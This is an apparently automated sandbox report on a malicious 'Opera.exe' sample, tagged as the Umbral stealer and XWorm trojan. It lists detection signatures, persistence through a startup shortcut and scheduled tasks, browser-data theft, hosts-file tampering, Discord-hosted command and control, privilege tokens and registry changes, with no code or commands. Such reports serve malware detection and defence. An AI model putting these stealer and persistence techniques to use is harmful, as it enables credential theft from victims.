Malware Analysis Report

2024-10-10 10:08

Sample ID 240426-qhm44scd74
Target Opera.exe
SHA256 d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18
Tags
umbral xworm rat spyware stealer trojan
score
10/10

Analysis Overview

Threat Level: Known bad

The file Opera.exe was found to be: Known bad.

Malicious Activity Summary

Umbral family

Xworm

Umbral

Xworm family

Detect Xworm Payload

Detect Umbral payload

Drops file in Drivers directory

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Checks computer location settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of SendNotifyMessage

Views/modifies file attributes

NTFS ADS

Uses Task Scheduler COM API

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Detects videocard installed

Suspicious behavior: GetForegroundWindowSpam

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-26 13:15

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral family

umbral

Xworm family

xworm

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-26 13:15

Reported

2024-04-26 13:26

Platform

win10-20240404-en

Max time kernel

599s

Max time network

602s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Opera.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral

stealer umbral

Xworm

trojan rat xworm

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Umbral3.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies Internet Explorer settings

adware spyware

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b8b6a935dd97da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b9234432dd97da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CacheLimit = "256000" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000077be5bc85fff0f41b198e57ac8b8fd556f949a8d834d04243c3e36a10818c33f9f86645be44698351fe2e4a6d231d32847088fcadd3e9ee4169c C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 69055f34dd97da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\Opera.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
